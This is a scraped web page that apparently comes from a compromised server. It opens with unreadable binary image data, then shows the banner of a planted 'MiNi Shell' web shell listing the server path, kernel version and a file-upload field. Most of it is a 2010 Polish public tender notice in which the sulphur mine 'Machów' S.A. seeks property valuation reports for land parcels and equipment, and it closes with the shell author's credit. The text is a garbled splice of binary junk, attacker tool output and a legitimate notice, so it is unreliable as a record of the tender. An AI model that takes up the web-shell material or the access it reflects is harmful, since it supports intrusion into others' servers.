JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100224/38927-N-2010.html

<p class="kh_header"><b>Tarnobrzeg: Opracowanie operatów szacunkowych określających wartość rynkową nieruchomości gruntowych oraz składników majątkowych.</b><br>
<b>Numer ogłoszenia: 38927 - 2010; data zamieszczenia: 24.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kopalnia Siarki "Machów" S.A. , ul. Zakładowa 50, 39-402 Tarnobrzeg, woj. podkarpackie, tel. 015 8233025, 8236948, faks 015 8233025.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ksmachow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zobowiązany do stosowania ustawy na podstawie art. 3 ust. 3 pzp.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie operatów szacunkowych określających wartość rynkową nieruchomości gruntowych oraz składników majątkowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie operatów szacunkowych określających wartość rynkową nieruchomości gruntowych oraz składników majątkowych.

PAKIET I:
1.	Opracowanie operatu szacunkowego określającego wartość rynkową nieruchomości, na którą składa się: 
prawo własności działek położonych we wsi Żupawa, gmina Grębów oznaczonych numerami ew.: 
1872 o pow. 0,15ha, 1875 o pow. 0,43ha, 1876 o pow. 0,78ha, 1877 o pow.0,28ha, 1878 o pow. 0,17ha, 1879 o pow. 0,41ha, 1881 o pow. 0,35ha, 1900 o pow.0,18ha, 1901 o pow. 0,14ha, 1903 o pow. 0,21ha, 1910 o pow. 0,11ha, 1912 o pow.0,48ha, 1937/1 o pow. 0,90ha, 1957 o pow. 0,30ha, 1958 o pow. 0,18ha, 1959 o pow.,08ha, 1965 o pow. 3,19ha, 1974/1 o pow. 0,03 ha, 1976/1 o pow. 0,12ha, 1978/1 o pow. 0,10ha, 1979/1 o pow.0,16ha, 1980/1 o pow.0,08ha, 1954 o pow. 0,39 ha, 1955 o pow. 0,48 ha.
o łącznej powierzchni 9,70 ha
prawo użytkowania wieczystego działek położonych we wsi Żupawa, gmina Grębów oznaczonych numerami ew.:
1867/1 o pow. 0,59 ha, 1874 o pow. 0,61 ha, 1892/5 o pow. 0,05 ha, 1892/6 o pow. 0,20 ha,  1894/3 o pow. 0,02 ha, 1898/1 o pow. 0,23 ha, 1899/1 o pow. 0,18 ha, 1902/3 o pow. 0,27 ha, 1902/4 o pow. 0,01 ha, 1904/1 o pow. 0,31 ha, 1905/1 o pow. 0,16 ha, 1906 o pow. 0,15 ha, 1907 o pow. 0,28 ha, 1908 o pow. 0,24 ha, 1909 o pow. 1,42 ha, 1911 o pow. 0,08 ha, 1913 o pow. 0,53 ha, 1914 o pow. 0,57 ha, 1915 o pow. 0,15 ha, 1916 o pow. 0,35 ha, 1917 o pow. 0,36 ha,  1918 o pow. 0,27 ha,  1919 o pow. 0,22 ha, 1920 o pow. 0,45 ha,  1922 o pow. 0,39 ha, 1923 o pow. 0,12 ha, 1924 o pow. 0,42 ha, 1925 o pow. 0,21 ha, 1926 o pow. 0,13 ha, 1927 o pow. 0,41 ha,  1928/1 o pow. 0,60 ha, 1929 o pow. 0,72 ha, 1930 o pow. 0,85 ha, 1931 o pow. 1,20 ha, 1932 o pow. 0,22 ha, 1933 o pow. 0,38 ha, 1934 o pow. 0,42 ha, 1935 o pow. 0,36 ha, 1936/1 o pow. 0,01 ha, 1939/1 o pow. 0,58 ha, 1940/1 o pow. 0,11 ha, 1941/1 o pow. 0,06 ha, 1948/1 o pow. 0,0012 ha, 1981/1 o pow. 0,09 ha, 1982/1 o pow. 0,32 ha. 
 o łącznej powierzchni 15,3012 ha
2.	Opracowanie operatu szacunkowego określającego wartość rynkową nieruchomości, na którą składa się: 
prawo własności działek położonych w obrębie Stale, gmina Grębów oznaczonych numerami ew.: 2026 o powierzchni 0,41ha, 1961 o powierzchni 0,14ha,
prawo użytkowania wieczystego działek położonych w obrębie Stale, gmina Grębów oznaczonych numerami ew.: 
1208 o powierzchni 0,15 ha,1204/2 o powierzchni 0,22 ha,2058 o powierzchni 0,19 ha, 2136/4 o powierzchni 0,06 ha,2136/6 o powierzchni 0,57 ha, 2136/7 o powierzchni 2,61 ha, 2136/9 o powierzchni 0,44 ha, 5019/15 o powierzchni 0,65 ha 
o łącznej powierzchni 5,44ha
3.	Opracowanie operatu szacunkowego określającego wartość rynkową nieruchomości, na którą składa się: 
prawo własności działek położonych w obrębie Stale, gmina Grębów oznaczonych numerami ew.: 3394 o powierzchni 0,26ha, 3469/1 o powierzchni 0,37ha.

Termin wykonania Części I:
rozpoczęcie: po zawarciu mowy
zakończenie: 12 kwietnia 2010r.
cel wyceny - do sprzedaży 

PAKIET II:
Opracowanie operatu szacunkowego określającego wartość rynkową nieruchomości, na którą składa się: 
prawo własności działek położonych w gminie  Łoniów   oznaczonych numerami ew.: 
Obręb Łążek :
138/3 o pow. 0,11 ha, 139/3 o pow. 0,13 ha, 139/4 o pow. 0,15 ha, 
o łącznej powierzchni 0,39 ha,
Obręb Chodków Stary 
670/2 o pow. 0,05 ha, 671/2 o pow. 0,13 ha, 672/3 o pow. 0,14 ha, 672/4 o pow. 0,06 ha, 652/7 o pow. 0,09 ha, 652/8 o pow. 0,03 ha, 652/9 o pow. 0,05 ha
o łącznej powierzchni 0,55 ha
Obręb Bogoria 
138/4 o pow. 0,08 ha, 138/6 o pow. 0,05 ha, 138/7 o pow. 0,05 ha, 139/5 o pow. 0,06 ha, 139/7 o pow. 0,04 ha, 139/8 o pow. 0,01 ha, 140/5 o pow. 0,03 ha, 140/6 o pow. 0,01 ha, 141/5 o pow. 0,06 ha
o łącznej powierzchni 0,39 ha 
Obręb Piaseczno 
37 o pow. 0,04 ha, 38 o pow. 0,04 ha, 39/1 o pow. 0,1440 ha, 39/2 o pow. 0,23 ha, 40/1 o pow. 0,0235 ha, 42/1 o pow. 0,1392 ha, 43 o pow. 0,04 ha, 44/1 o pow. 0,04 ha, 44/2 o pow. 0,05 ha, 46/3 o pow. 0,1946 ha, 46/5 o pow. 0,1653 ha,50/3 o pow. 0,0963 ha, 289/1 o pow. 0,0364 ha, 329/6 o pow. 0,04 ha, 398/6 o pow. 0,0883 ha, 399/7 o pow. 0,0321 ha, 399/8 o pow. 0,02 ha, 400/4 o pow. 0,0004 ha, 414 o pow. 0,35 ha, 416 o pow. 0,19 ha
o łącznej powierzchni 1,9601 ha
Ogółem powierzchnia wynosi 3,2901 ha.

Prawo własności posadowionego na działkach ewid. nr 416 w obrębie Piaseczno i 138/4 w obrębie Bogoria budynku nastawni Stary Łążek.
Termin wykonania Części II:
rozpoczęcie: po zawarciu mowy
zakończenie: 12 kwietnia 2010r.
cel wyceny- do sprzedaży

PAKIET III:

1.	Opracowanie operatu szacunkowego określającego wartość rynkową nieruchomości, na którą składa się: 
prawo własności działek położonych w obrębie Kajmów  oznaczonych  numerami  ew.: 87/4 o pow. 0,0230 ha, 87/6 o pow. 0,0936 ha, 87/7 o pow. 0,2438 ha,  91/5 o pow. 0,1109 ha, 
o łącznej powierzchni 0,4713 ha 
prawo użytkowania wieczystego działek położonych w obrębie Kajmów  oznaczonych numerami ew.: 88/2 o pow. 0,0867ha, 87/5 o pow. 0,0703 ha, 88/4 o pow. 0,1456 ha, 89/4 o pow. 0,0114 ha, 89/5 o pow. 0,0631 ha, 89/7 o pow. 0,1516 ha, 90/4 o pow. 0,0015 ha, 90/5 o pow. 0,0479 ha, 90/7 o pow. 0,1308ha, 91/3 o pow. 0,0496 ha,
o łącznej powierzchni 0,7585 ha 
 Przez działki 87/4, 88/2, 89/4, 89/5, 90/4, 90/5, 91/3 przechodzi kolektor bariery zewnętrznej a na działce nr 88/2 znajduje się studnia odwodnienia trzeciorzędowego, nie będące przedmiotem wyceny.
2.	Opracowanie operatu szacunkowego określającego wartość rynkową nieruchomości, na którą składa się: 
prawo użytkowania wieczystego działki o położonej w obrębie Machów, gmina Tarnobrzeg oznaczonej nr ew: 958/2 o pow.  0,1338 ha,
prawo użytkowania wieczystego działki o położonej w obrębie Nagnajów, gmina Tarnobrzeg oznaczonej nr ew: 277/67 o pow.  0,5090 ha,
prawo własności działek   położonych w obrębie Ocice, gmina Tarnobrzeg oznaczonych nr ewid: 301/1 o pow. 0,0177 ha 301/2 o pow. 0,4497 ha,
prawo własności działki położonej w obrębie Ocice, gmina Tarnobrzeg oznaczonej nr ew: 306/1 o pow. 0,3525 ha. 

Termin wykonania Części III:
rozpoczęcie: po zawarciu mowy
zakończenie: 12 kwietnia 2010r.
cel wyceny- do sprzedaży

PAKIET IV:

1.	Opracowanie operatów szacunkowych określających wartość rynkową nieruchomości, na którą składa się: 
prawo użytkowania wieczystego działek położonych w obrębie Grzybów gmina Staszów oznaczonych numerami ew.: 98 o pow. 0,0505ha, 113 o pow. 0,1870ha,181 o pow. 0,2850ha,182 o pow. 0,0784ha, 183 o pow. 0,1992ha, 186 o pow. 0,3700ha, 191 o pow. 0,1300ha, 349 o pow. 0,9840 ha,355/1 o pow. 0,0556ha, 362/1 o pow. 0,0673, 389/1 o pow. 0,1433, 390/1 o pow. 0,1602, 391/1  o pow. 0,1577, 395/1 o pow. 0,1459ha, 412/1 o pow. 0,1045ha,430/1 o pow. 0,0384ha , 447/1 o pow. 0,0195ha,  466 o pow. 0,0350 ha, 486 pow. 0,0278ha, 489 o pow. 0,1129ha, 510/2 o pow. 0,0793 ha, 511/2 o pow. 0,0829ha, 512/2 o pow. 0,0806ha, 516/2   o pow. 0,0895ha, 533/2 o pow. 0,1157ha,551/2 o pow. 0,0387ha, 568/2 o pow. 0,0367ha,  1336    o pow. 0,3500ha, 1338/2 o pow. 1,1800 ha, 1338/3 o pow. 0,3700ha, 1364 o pow. 3,7300ha, 1367/1 o pow. 0,7338ha, 1367/3 o pow. 0,0705ha, 1368 o pow. 0,4283ha, 1369 o pow. 0,5720ha, 1370 o pow. 1,7262ha, 1371 o pow. 0,3175ha, 1372 o pow. 0,0656ha, 1373 o pow. 0,0770ha, 1378 o pow. 1,5914 ha, 1379 o pow. 0,1612ha, 1380 o pow. 0,0651ha, 1381 o pow. 0,1086ha.
o łącznej powierzchni 15,4228 ha
prawo własności działek położonych w obrębie  Grzybów  gmina Staszów  oznaczonych numerami ew.: 417/1 o pow. 0,0853 ha, 538/2 o pow. 0,0923ha 
o łącznej powierzchni 0,1776 ha
2.	Opracowanie operatów szacunkowych określających wartość rynkową nieruchomości, na którą składa się: 
prawo użytkowania wieczystego działki położonej w obrębie Staszów o nr ew. 6193 o powierzchni 0.7526 ha,
prawo własności działki położonej w obrębie Staszów o nr ew. 2977/6 o powierzchni 0.1143 ha,
wraz z określeniem wartości posadowionych na nieruchomości budynków garażowych. 
Termin wykonania:
rozpoczęcie: po podpisaniu mowy
zakończenie: 12 kwietnia 2010r.
cel wyceny- do sprzedaży


PAKIET V:
Opracowanie operatów szacunkowych określających wartość rynkową środków trwałych:
-	przyczepa 			nr inw. 748-320-04164
-	tokarka 			nr inw. 400-000-01144
-	punkt dozowania wapna	nr inw. 665-659-06369
Termin wykonania:
rozpoczęcie: po podpisaniu mowy
zakończenie: 12 kwietnia 2010r.
cel wyceny - do sprzedaży.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.31.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena nastąpi na podstawie oświadczenia, o którym mowa w zał. nr 2 do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena nastąpi na podstawie oświadczenia, o którym mowa w zał. nr 2 do oferty oraz na podstawie 
sporządzonego przez Wykonawcę wykazu wykonanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  odpowiadających swoim rodzajem i wartością usługom stnowiacym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (wg załącznika nr 4 do oferty) oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie np. referencji.

Za niezbędne uznaje się wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługi polegającej na wykonaniu operatu szacunkowego określającego wartość rynkową nieruchomości gruntowej o wartości usługi porównywalnej z wartością przedmiotu niniejszego zamówienia. Za wartość porównywalną uznaje się wartość nie mniejszą niż 80% oferowanej przez Wykonawcę ceny wykonania niniejszego zamówienia. Obliczenie wartości porównywalnej nastąpi odpowiednio dla pakietów  przedmiotu zamówienia, do których Wykonawca składa ofertę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena nastąpi na podstawie oświadczenia, o którym mowa w zał. nr 2 do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena nastąpi na podstawie oświadczenia, o którym mowa w zał. nr 2 do oferty oraz na podstawie
- wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami; (wg załącznika nr 3 do oferty). 
Za niezbędne uznaje się dysponowanie przez Wykonawcę co najmniej  1 osobą posiadającą uprawnienia Rzeczoznawcy Majątkowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena nastąpi na podstawie oświadczenia, o którym mowa w zał. nr 2 do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ksmachow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kopalnia Siarki machów S.A.
ul. Zakładowa 50
39-402 Tarnobrzeg 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2010 godzina 09:00, miejsce: Sekretariat Zamawiającego..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com